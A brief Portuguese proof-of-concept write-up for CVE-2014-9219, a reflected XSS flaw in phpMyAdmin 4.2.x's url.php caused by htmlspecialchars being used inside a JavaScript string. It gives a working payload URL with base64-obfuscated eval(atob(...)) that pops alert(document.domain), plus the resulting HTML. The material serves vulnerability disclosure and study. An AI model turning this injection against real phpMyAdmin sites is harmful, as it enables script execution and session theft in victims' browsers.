
CVE-2014-9219 XSS POC
CVE-2014-9219 POC de XSS
A vulnerabilidade é causada por um erro de validação de entrada no recurso de redirecionamento em url.php no phpMyAdmin 4.2.x anterior a 4.2.13.1 ao processar o parâmetro url. Um atacante remoto pode enganar a vítima para seguir um link especialmente criado e executar código HTML e script arbitrário no navegador da vítima no contexto de segurança do site vulnerável.
phpMyAdmin: 4.2.0 - 4.2.13
O código vulnerável usa htmlspecialchars() para sanitizar o parâmetro URL antes de inseri-lo em um contexto de string JavaScript:
window.location='" . htmlspecialchars($_GET['url']) . "';
htmlspecialchars() é projetado para contexto HTML, não contexto de string JavaScript. Ele não escapa adequadamente caracteres que podem sair de literais de string JavaScript.
url codificada:
url.php?url=http%3A%2F%2Fwww.phpmyadmin.net%2F'%2beval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))%2b'
url decodificada:
url.php?url=http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'
Saída HTML:
<script type='text/javascript'>
window.onload=function(){
window.location='http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'';
}
</script>Taking you to http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'.